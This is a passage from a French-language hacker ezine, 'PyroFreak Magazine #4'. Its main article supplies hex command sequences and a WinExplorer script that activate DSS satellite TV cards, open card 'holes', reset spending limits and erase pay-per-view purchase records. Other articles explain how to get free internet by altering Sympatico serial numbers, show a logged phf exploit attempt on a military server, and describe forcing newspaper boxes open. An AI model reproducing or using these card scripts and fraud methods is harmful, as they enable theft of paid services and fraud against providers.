normal y'ai conçu par moi ;)) Il expire en avril 2005 donc vous allez avoir beaucoup 
de plaisir à ecouter la tv ;)) pis c'est ça, mais ca ne vous donne que 650$ de location 
de tv et 650 de ussb bon c'est quand meme beaucoup la mais j'explique a la fin comment 
effacer nos "past purchase" ;) ok pour mon fichier d'activation meme si on a shooter 50 
choses sur notre carte on va la cleaner!

48 3E 00 00 00
R01

ensuite on est pret a shooter notre beau fichier d'activation.
Hmmm, merci cyber!!!

;------dici 
48 42 00 00 26
R01
09 24 00 00 30 3D 03 E9 19 A6 2B 03 EA 40 1E 55
33 33 37 36 34 20 20 2D 50 1A 31 E4 09 10 00 00
0C 71 3C 6B 7D FF
R02
48 42 00 00 30
r01
09 24 00 00 30 38 09 06 55 33 33 37 36 34 20 20
12 00 00 00 00 00 00 00 00 00 08 00 00 00 00 00
00 00 00 19 A6 40 09 10 00 00 0C 71 3C 6B 7D FF
r02
48 42 00 00 2D
R01
09 24 00 00 30 14 F8 00 26 90 00 14 F9 00 14 FA
00 14 90 00 26 91 00 14 91 00 26 90 00 14 F0 00
14 FE 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 24
R01
09 24 00 00 30 4E 00 5C 2F EA 56 0D 00 00 01 00
66 00 01 FD E9 1B 59 00 00 40 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 33 78 9F DE C0 41 33 77 9F DE
C0 41 33 76 9F DE C0 41 33 75 9F DE C0 41 33 96
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 31
R01
09 24 00 00 30 41 36 B0 9F DE C0 41 3E 80 9F DE
C0 41 3A 98 9F DE C0 56 0D 01 00 02 00 66 00 01
FD E9 FF FE 00 00 40 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 33 7C 9F DE C0 41 33 7A 9F DE
C0 41 33 8F 9F DE C0 41 33 3F 9F DE C0 41 33 56
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 33 9B 9F DE C0 41 33 46 9F DE
C0 41 33 95 9F DE C0 41 33 9A 9F DE C0 41 34 6E
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 34 9D 9F DE C0 41 33 A0 9F DE
C0 41 33 E7 9F DE C0 41 33 E8 9F DE C0 41 33 7D
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
r01
09 24 00 00 30 41 34 9E 9F DE C0 41 34 9D 9F DE
C0 41 34 72 9F DE C0 41 33 42 9F DE C0 41 33 89
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 33 82 9F DE C0 41 34 47 9F DE
C0 41 33 84 9F DE C0 41 33 99 9F DE C0 41 34 71
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 2D
R01
09 24 00 00 30 41 34 71 9F DE C0 41 33 85 9F DE
C0 41 34 AD 9F DE C0 41 33 E9 9F DE C0 41 33 80
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R0248 42 00 00 2D
R01
09 24 00 00 30 41 34 49 9F DE C0 41 33 7E 9F DE
C0 41 33 7F 9F DE C0 41 33 81 9F DE C0 41 33 7B
9F DE C0 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 4C 00 00 09
R01
00 00 00 00 01 52 09 95 00
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 01 82 FC 11 56 63 88
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
r02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 02 8F F1 79 81 1C EC
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 03 8F F5 FA 24 FD 02
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 04 8F F9 86 79 FF FF
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
r02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 05 84 F8 00 02 1C C1
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 06 85 88 FC 91 F9 90
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 07 86 70 02 8F F1 84
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1E
R01
09 12 00 00 30 60 C0 0A 00 08 84 60 A8 76 B8 E8
00 22 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
r02
48 40 00 00 1E
R01
09 12 00 00 30 60 C0 0A 00 09 86 05 84 91 60 30
5F 05 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 24
R01
09 12 00 00 30 60 C0 10 00 0A 8F 3B 48 03 85 4C
4F B4 57 5A 80 FE AF 31 BB 00 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 40 00 00 24
R01
09 12 00 00 30 60 C0 10 00 0B 8F 2F FF 09 E5 28
54 80 12 13 48 74 09 B4 BB 00 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 40 00 00 24
R01
09 12 00 00 30 60 C0 10 00 0C 8F 47 63 07 60 22
F5 50 02 05 F9 30 51 03 BB 00 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 40 00 00 24
R01
09 12 00 00 30 60 C0 10 00 0D 8F 53 85 4F 4C 53
32 1F C2 70 7D FF 02 8B BB 00 09 10 00 00 0C 71
3C 6B 7D FF
R02
48 40 00 00 21
R01
09 12 00 00 30 60 C0 06 00 0E 8B F8 F1 45 C0 05
00 0E 8F 5F 92 BB 00 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 40 00 00 21
R01
09 12 00 00 30 60 C0 05 00 0F 86 6D 41 C0 06 00
0F 89 65 F1 4B BB 00 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 40 00 00 1E
R01
09 12 00 00 30 60 C0 0A 00 10 8B A5 E5 50 70 FE
F1 50 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 21
R01
09 12 00 00 30 60 C0 0D 00 11 8F 60 E5 4E 24 FE
54 0C 02 86 60 BB 00 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 40 00 00 1D
R01
09 12 00 00 30 60 C0 09 00 12 86 5C 02 8F 60 22
60 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 20
R01
09 12 00 00 30 60 C0 05 00 13 82 93 02 C0 05 00
13 82 97 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 20
R01
09 12 00 00 30 60 C0 05 00 14 82 AB 00 C0 05 00
14 8F 44 61 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 15 85 8B ED B4 AA 00
40 18 80 0C BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 21
R01
09 12 00 00 30 60 C0 0D 00 16 8F 70 E5 4C 24 41
40 33 02 15 BF BB 00 09 10 00 00 0C 71 3C 6B 7D
FF
R02
48 40 00 00 1F
R01
09 12 00 00 30 60 C0 0B 00 17 8F 79 E7 54 3F F7
02 87 81 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1A
R01
09 12 00 00 30 60 C0 06 00 18 85 D0 8F 79 BB 00
09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 19 85 91 90 0C 98 84
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 19
r01
09 12 00 00 30 60 C0 05 00 1A 8F 2F 09 BB 00 09
10 00 00 0C 71 3C 6B 7D FF
R02
;------ a ici

Maintenant la carte est activée! youpi!! dès que vous la metterez dans un receiver 
elle ne marchera que dans celui-ci et dans aucun autre!!
Bon maintenant je vous suggeres de fermer le hole 09.

48 40 00 00 19
r01
09 12 00 00 30 60 C0 05 00 1A 8F 2F 09 BB 00 09
10 00 00 0C 71 3C 6B 7D FF
R02

ok! Que la carte marche ou pas c'est pas mon problème. Une carte normal devrais 
marcher après tous ca! Si vous ne voyez aucune image mais avec toutes les postes, 
c'est parce qu'il y a eu avant sur votre carte, un 3m mal désinstallé(un 3m passe 
par dessus tout, il y a pas d'expiration et tu payas pas les film, c'est comme un 
decodeur pirate.) Alors, essayez d'aller désinstaller votre 3m dans vortex! C'est 
pas mal le seul moyen mais bon je ferai un article a ce sujet dans le prochain numero!! 
ok? bon good de toute facon ya personne qui lis mes articles ;) ok maintenant vous 
voulez savoir comment toute réavoir votre cash dans les pay per view hein!! ok shootez 
simplement ce fichier si!!

48 42 00 00 1D
R01
09 1A 00 00 30 60 C9 0D 00 01 00 00 00 09 24 09
24 09 24 22 22 BB 00 0C 02 9C 62 95 FA
R02
48 42 00 00 1D
R01
09 1A 00 00 30 60 C9 0D 00 01 80 00 00 09 24 09
24 09 24 22 22 BB 00 0C 16 FC 5B 73 BF
R02
48 42 00 00 1C
R01
09 1A 00 00 30 60 D2 02 AC 00 C0 08 00 1B 85 14
01 8F 2F FF BB 00 0C D0 24 2F 61 D7
R02
48 40 00 00 1A
r01
09 22 00 00 30 60 c0 06 00 1C 85 d0 87 81 bb 00
09 10 00 00 0C 71 3C 6B 7D FF
r02
48 42 00 00 1C
R01
09 22 00 00 30 60 C0 08 00 1D 88 5E 00 00 00 00
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 22 00 00 30 60 C0 0c 00 1E 88 62 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 22 00 00 30 60 C0 0c 00 1F 88 6A 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 1b
r01
60 d0 16 8e 84 06 d0 85 93 02 50 11 d5 85 dc 85
a7 85 00 00 00 00 00 00 ef bb 00
r02
48 40 00 00 1b
r01
60 d0 16 8e 83 D8 d0 85 93 02 50 11 d5 85 dc 85
a7 85 00 00 00 00 00 01 ef bb 00
r02
48 40 00 00 1b
r01
60 d0 16 8e 83 E4 d0 85 93 02 50 11 d5 85 dc 85
a7 85 00 00 00 00 00 01 ef bb 00
r02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 01 80 28 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 02 80 30 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 03 80 38 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 04 80 40 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 05 80 48 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
09 12 00 00 30 60 C0 0C 00 06 80 50 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 07 80 58 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 08 80 60 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 09 80 68 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0A 80 70 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0B 80 78 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0C 80 80 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0D 80 88 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0E 80 90 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 0F 80 98 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 10 80 A0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 11 80 A8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 12 80 B0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 13 80 B8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 14 80 C0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 15 80 C8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 16 80 D0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 17 80 D8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 18 80 E0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 19 80 E8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
48 40 00 00 19
r01
09 12 00 00 30 60 C0 05 00 1A 8F 2F 09 BB 00 09
10 00 00 0C 71 3C 6B 7D FF
R02

Encore les 25 doubles line pour les 25 ppv dumb entk bon maintenant je peux vous 
montrez un fichier qui fait la meme chose et encore plus c'est un fichier qui va 
seulement marcher avec win explorer car il est scripté pour win explorer. Tout au 
long de son déroulement il sera entièrement customizable..... c'est cool hein!! 
Bon essaye ca.


;---------- ici
Option Explicit

Sub Main()
	Dim ErrorString
	Dim UpdateNumber
	
	If Sc.Version < 3.2 Then
		ErrorString = "You Need Version 3.2 or Greater of WinExplorer To Run This Script"
		Sc.MsgBox ErrorString, vbCritical
		Err.Raise 1050, , ErrorString
	End If

	If Sc.ByteDelay < 60000 Then
		Sc.ByteDelay = 60000
	End If


	If GetUSW() <> 26 Then
		ErrorString = "Your USW is not at 26(decimal), This Script is only for cards at 26 Updates"
		Sc.MsgBox ErrorString, vbCritical
		Err.Raise 1050, , ErrorString
	End If

	Call OpenHoles()
			
	Call CleanPPV()
	
	Sc.Print(vbCrLf & "Clear Purchase Amounts" & vbCrLf) 
	
	Sc.Write("48 40 00 00 0F")
    Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 06 02 83 D8 00 01 00 BB 00")
    Sc.Read(&H2)

	
	Sc.Write("48 40 00 00 0F")
    Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 06 02 83 E4 00 01 00 BB 00")
    Sc.Read(&H2)
	
	  
    Sc.Print(vbCrLf & "Setting Spending Limits" & vbCrLf)
    
	Sc.Write("48 42 00 00 24")
	Sc.Read(&H1)
	Sc.Write("09 24 00 00 30 4E 00 3C 2F EA")
	Sc.Write("56 0D 00 00 01 00 66 00 01")
	Sc.Write("FD E9") '($650.00) (hex value -1)cents
	Sc.Write("1B 59 00 00")
	Sc.Write("40 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)
	
	Sc.Write("48 42 00 00 24")
	Sc.Read(&H1)
	Sc.Write("09 24 00 00 30 4E 00 3C 2F EA")
	Sc.Write("56 0D 01 00 02 00 6B 00 01")
	Sc.Write("1D 4D") '($75.00) (hex value -1)cents
	Sc.Write("FF FE 00 00")
	Sc.Write("40 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)
	
    Sc.Print(vbCrLf & "Unmarry Receiver" & vbCrLf)
    
    Sc.Write("48 40 00 00 11")
    Sc.Read(&H1)
    Sc.Write("60 D5 02 85 8E E3 08 04 83 D0 00 00 00 00 00 BB 00")
    Sc.Read(&H2)
     	
	Call CloseHoles()
End Sub

'================================================================

Sub OpenHoles()
	
	Sc.Print(vbCrLf & "Open 09 and E3 Hole" & vbCrLf)
	Sc.Reset

	Sc.Write("48 42 00 00 1D")
	Sc.Read(&H1)
	Sc.Write("09 1A 00 00 30 60 C9 0D 00 01 00 00 00 09 24 09")
	Sc.Write("24 09 24 22 22 BB 00 0C 02 9C 62 95 FA")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1D")
	Sc.Read(&H1)
	Sc.Write("09 1A 00 00 30 60 C9 0D 00 01 80 00 00 09 24 09")
	Sc.Write("24 09 24 22 22 BB 00 0C 16 FC 5B 73 BF")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1C")
	Sc.Read(&H1)
	Sc.Write("09 1A 00 00 30 60 D2 02 AC 00 C0 08 00 1B 85 14")
	Sc.Write("01 8F 2F FF BB 00 0C D0 24 2F 61 D7")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1C")
	Sc.Read(&H1)
	Sc.Write("09 12 00 00 30 60 C0 08 00 1C 88 5E 00 00 00 00")
	Sc.Write("BB 00 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1C")
	Sc.Read(&H1)
	Sc.Write("09 12 00 00 30 60 C0 08 00 1D 88 62 00 00 00 00")
	Sc.Write("BB 00 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)

	Sc.Write("48 42 00 00 1C")
	Sc.Read(&H1)
	Sc.Write("09 12 00 00 30 60 C0 08 00 1E 88 66 00 00 00 00")
	Sc.Write("BB 00 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)
	
	Sc.Write("48 42 00 00 19")
	Sc.Read(&H1)
	Sc.Write("09 12 00 00 30 60 C0 05 00 1F 85 91 80") 
	Sc.Write("BB 00 09 10 00 00 0C 71 3C 6B 7D FF")
	Sc.Read(&H2)

End Sub
'================================================================

Sub CloseHoles()
	Sc.Print(vbCrLf & "Closing Holes and Restoring USW to 26(decimal) updates" & vbCrLf)
	Sc.Reset
	
	Sc.Write("48 40 00 00 0F")
    Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 06 02 84 06 00 1A 00 BB 00")
    Sc.Read(&H2)
 
	Sc.Write("48 40 00 00 0E")
    Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 05 01 8F 2F 09 00 BB 00")
    Sc.Read(&H2)

	Sc.Write("48 40 00 00 11") 
	Sc.Read(&H1)
	Sc.Write("60 D5 02 85 8E E3 08 04 85 91 90 0C 98 84 00 BB 00")
	Sc.Read(&H2)
End Sub
'================================================================

Sub CleanPPV()
	Dim OldState
	Dim ThisSlot
	Dim ThisByte
	Dim PpvInfo(74)
	Dim UpdateNumber
	Const StartAddress = &H8028		' Starting Memory Address to Clear

	Sc.Reset

	Sc.Print(vbCrLf & "Checking PPV Slots" & vbCr)
	UpdateNumber = GetUSW() + 1		' Next Update Number

	Oldstate = Sc.Verbose
	Sc.Verbose = False

	Sc.Write("48 5F 00 0E 4E")
	Sc.Read(1)
	Sc.Read(&H4D)
	Sc.Verbose = Oldstate

	For ThisByte = 0 To 74
		PpvInfo(ThisByte) = Sc.GetByte(ThisByte)	' Save a copy of the PPV info
	Next


	For ThisSlot = 0 To 24
		ThisByte = ThisSlot * 3
		If PpvInfo(ThisByte) Or PpvInfo(ThisByte + 1) Or (PpvInfo(ThisByte + 2) <> &H20) Then
			Sc.Print(vbCrLf & "Clearing PPV Slot #" & ThisSlot + 1 & vbCr)
			Sc.Write("48 42 00 00 20")
			Sc.Read(&H1)
			Sc.Write("09 12 00 00 30 60 C0 0C")
			Sc.Write(HexString(UpdateNumber, 4) & HexString((ThisSlot * 8) + StartAddress, 4))
			Sc.Write("00 00 00 00 00 00 00 00 BB 00")
			Sc.Write("09 10 00 00 0C 71 3C 6B 7D FF")
			Sc.Read(&H2)
			UpdateNumber = UpdateNumber + 1
		End If
	Next
End Sub
'================================================================

Function GetUSW()
	Dim Oldstate

	Sc.Reset

	Oldstate = Sc.Verbose
	Sc.Verbose = False

	Sc.Write("48 2B 00 00 80")
	Sc.Read(131)

	GetUSW =(Sc.GetByte(29) * &H100) + Sc.GetByte(30)

	Sc.Verbose = Oldstate
End Function
'================================================================

Function HexString(ThisNumber, Length)
	Dim RetVal
	Dim CurLen



	RetVal = Hex(ThisNumber)
	CurLen = Len(RetVal)
	
	If CurLen < Length Then
		RetVal = String(Length - CurLen, "0") & RetVal
	End If
		
	HexString = RetVal
End Function
'================================================================


Super comme fichier non?? entk y'ai super jai trouvé ca quelque part sur le net, 
c'est bien cool!

Ok c'est pas mal tout, bon merci à la seule personne au monde qui aura lu mon article. 
Sans doute seulement parce que ce fut un mordu des ezines pis qui l'a lu pour le fun 
entk! J'ai pu vraiment rien d'autre à dire que Félicitation aux seuls personnes qui 
hack les satellites!! 

keep sat hack keep dss and read my article ;)) 
Comme d'habitude je ne suis pas responsable de toute ces merdes ;)
cya guy!!




 ___ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Free Internet Connection 
'.________ __ __ ___________ ____ __________ _______Par CyberRider __


Commme dans presque tous les numeros d'ezine ya toujours quelqu'un qui ecrit un 
article sur les connections internet gratosse!! mais la plus part parlent toujours 
de comment piquer l'acces à son chum ou a un trou de cul qu'on connait meme pas mais 
ici la super solution ultime qui vous offre d offrir votre compte internet totalement 
gratuitement* !!! 

Comment? c'est simple, suis ce qui suit!!!

* : Aucune attrape n'est comprise

Sans le savoir Sympatico nous offre des occasions illimités de pouvoir se denicher 
des 50 hrs gratuites par mois sans le savoir mais puisque je le publie dans un e-zine 
et quil y aura surement exageration ( comme dans tout) ce petit truc ne marchera 
surement pas très très longtemps.

Bon, le principe en ayant une trousse de sympatico de 50 hrs gratuite 
est que vous avez un petit collant qui vous donne un joli numero de serie pour obtenir 
une seule connection de 50 hrs!! Mais bon, un numero de série ca se change par chez 
nous!!! ;)

Ok pour commencer tu te deniche une trousse de sympatico! 
C'est totalement gratuit tu appelles au service des membres au 1 888 279 6728 , la ya 
une tite bonne femme qui te repond et qui te dit : Oui c'est tu pour une commande de 
disquette (là elle te dit ca dans un accent d'anglais laid, on dirait qu'elle parle 
espagnol au lieu de francais!) Donc, là tu dit; stu veut toé criss!!! Nenon sans joke, 
tu dis oui tu fait ce qui faut faire et c'est gratuit!!

Bon ensuite, passons à nos heures gratos de Sympatico!! hmmm!!

Le momment attendu wow... tu va voir ya rien de passionnant la dedans!
Quand tu installes le programme sympatico apres tu demarre le netscape ou autre browser, 
ensuite ca part plein de cochonerie pis ca dis comment t'enregistrer. Tu entres tes infos, 
là ça entre sur le net et te demande ton # de serie et ton mode de paiement!! Tu dis par 
carte de edit alors tu dois donner ton vrai number de carte de credit mais je le jure a 
100% que c'est free !! 

Checkons le numero de serie maintenant!!! hmmmm 6390738378213434520 bon ce numero doit 
déjà être prit a l'heure qu'il est!!!

bon 6390738378213434520
       ^ 
       |--------------|
les numeros que tu peut changer!!!

Bon alors tu changes les numeros que tu veux dans le but de faire sauter
plusieurs acces, vous comprenez le principe? Admettons que tu marques 6390738378613636520 
ça va marcher et t'a le net 50 hrs gratosse pendant 1 mois mais quand ça te demande le prix 
apres le paiement metton tu marque 10 piasses!! mais une coupe de semaine après ton 
abonnement tu appelles à la centrale sympatico et tu dis que tu souhaites stopper ton 
abonnement à la fin du mois!! Et UP! après ce mois là, tu t'en fait un autre! 

Mais la j'en suis pas responsable, alors attention !!!!!


CyberRider


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
|                      Funny PHF Attempt :))))
'.________ __ __ ___________ ____ __________ ___ _______Par Endrix __


Attempt by ppp036.g002.cactuscom.com/207.253.190.36 to exploit phf has been logged. 


USE OF THIS OR ANY OTHER DOD INTEREST COMPUTER SYSTEM CONSTITUTES
A CONSENT TO MONITORING AT ALL TIMES
THIS IS A DEPARTMENT OF DEFENSE (DOD) INTEREST COMPUTER SYSTEM.
ALL DOD INTEREST COMPUTER SYSTEMS AND RELATED EQUIPMENT ARE INTENDED
FOR THE COMMUNICATION, TRANSMISSION, PROCESSING, AND STORAGE OF
OFFICIAL U.S. GOVERNMENT OR OTHER AUTHORIZED INFORMATION ONLY.
ALL DOD INTEREST COMPUTER SYSTEMS ARE SUBJECT TO MONITORING AT ALL
TIMES TO ENSURE PROPER FUNCTIONING OF EQUIPMENT AND SYSTEMS INCLUDING
SECURITY DEVICES AND SYSTEMS, TO PREVENT UNAUTHORIZED USE AND
VIOLATIONS OF STATUTES AND SECURITY REGULATIONS, TO DETER CRIMINAL
ACTIVITY, AND FOR OTHER SIMILAR PURPOSES. ANY USER OF A DOD INTEREST
COMPUTER SYSTEM SHOULD BE AWARE THAT ANY INFORMATION PLACED IN THE
SYSTEM IS SUBJECT TO MONITORING AND IS NOT SUBJECT TO ANY EXPECTATION
OF PRIVACY.
IF MONITORING OF THIS OR ANY OTHER DOD INTEREST COMPUTER SYSTEM
REVEALS POSSIBLE EVIDENCE OF VIOLATION OF CRIMINAL STATUTES, THIS
EVIDENCE AND ANY OTHER RELATED INFORMATION, INCLUDING IDENTIFICATION
INFORMATION ABOUT THE USER, MAY BE PROVIDED TO LAW ENFORCEMENT
PAGE 4 RUEJDCA0232 UNCLAS RELEASABLE TO NATO AS NATO UNCLAS
OFFICIALS. IF MONITORING OF THIS OR ANY OTHER DOD INTEREST COMPUTER
SYSTEM REVEALS VIOLATIONS OF SECURITY REGULATIONS OR UNAUTHORIZED
USE, EMPLOYEES WHO VIOLATE SECURITY REGULATIONS OR MAKE UNAUTHORIZED
USE OF DOD INTEREST COMPUTER SYSTEMS ARE SUBJECT TO APPROPRIATE
DISCIPLINARY ACTION.
USE OF THIS OR ANY OTHER DOD INTEREST COMPUTER SYSTEM CONSTITUTES
A CONSENT TO MONITORING AT ALL TIMES


webadmin@ncts.navy.mil


------> hehe damn ;)

- endrix


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Divertissement gratuit :)
'.________ __ __ ___________ ____ ________ ______ ______Par Endrix __


-=-=-=-=-=-=-=-=-=-=-=-=-=
Lecture qui coute rien !!!
-=-=-=-=-=-=-=-=-=-=-=-=-=

Hey bien voilà... Tout a commencé quand.......... {

Pendant la journée, j'avais pratiquement rien a faire alors j'ai
appeller des amis(es) et j'ai aprit qu'il y avait un party à
Gatineau ce même soir. Nous avons décider d'y aller !!! Bon, le
soir venu, mon chum vient me porter chez une amie et nous nous
sommes rencontrés la. Bon, il fallait se rendre aux Promenates
pour prendre un autobus qui allait nous menez jusqu'au party.
Nous marchons, Nous marchons, Nous marchons.... Ah j'ai faim,
alors nous nous sommes arrêter au Burger King. J'aime bien ca
la bouffe qui font la mais ca l'air que mon ami ne va plus y
retournée parce qu'il a vu la femme entrain de faire le HamBurger
se pogné le cul et après mettre des tomates... C'est vraiment
dégeulasse non ??? En tk... Nous repartons... Arrivé aux
Promenades, il fallait attendre 20 minutes criss au froid.. en
tk.. Bon, j'ai trouvé quelque chose à faire !!! Un journal !!!!!
Mais, merde.. J'ai pas d'argent... grrrr... Un ami me dit : "Pas
besoin d'argent pour ca voyon... !! ". Je dit "ok ouin et
comment?" Et bien à ce moment, il tire la petite porte doucement
et la il commence à donner des petits coups dessus, juste en
haut ou il y a la barrure !!! Et la... CLICK !!! La portière
ouvre ;) Bon.. C'est pas un journal qui est bon.. Ahh !! Il y a
Le Droit ;) Hey bien bam, bam, bam pour le droit aussi!! héhéhé

Ca marche très bien !! Essayez le et vous verez !!!

- endrix.(j'avais rien a faire)



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Système GSM pour les Cel 
'.________ __ __ ___________ ____ ____________ _ __ ____SlasHerZ __


Lo, voici un ptit file sur les GSM, cette norme francaise de telephonie
cellulaire apparue en 1982. Ici ne sera relatee que la theorie du 
fonctionnement de la securite de ces cellphones.

( La plupart des SYSTEM de Sécurité CELLULAIRE fonctionnent sous la meme base )

Intro
-----

Apres l'epoque des cells analogiques utilisant les systemes TACS et AMPS,
on a vu arriver sur le marche des nouveaux mobiles fonctionnant grace au 
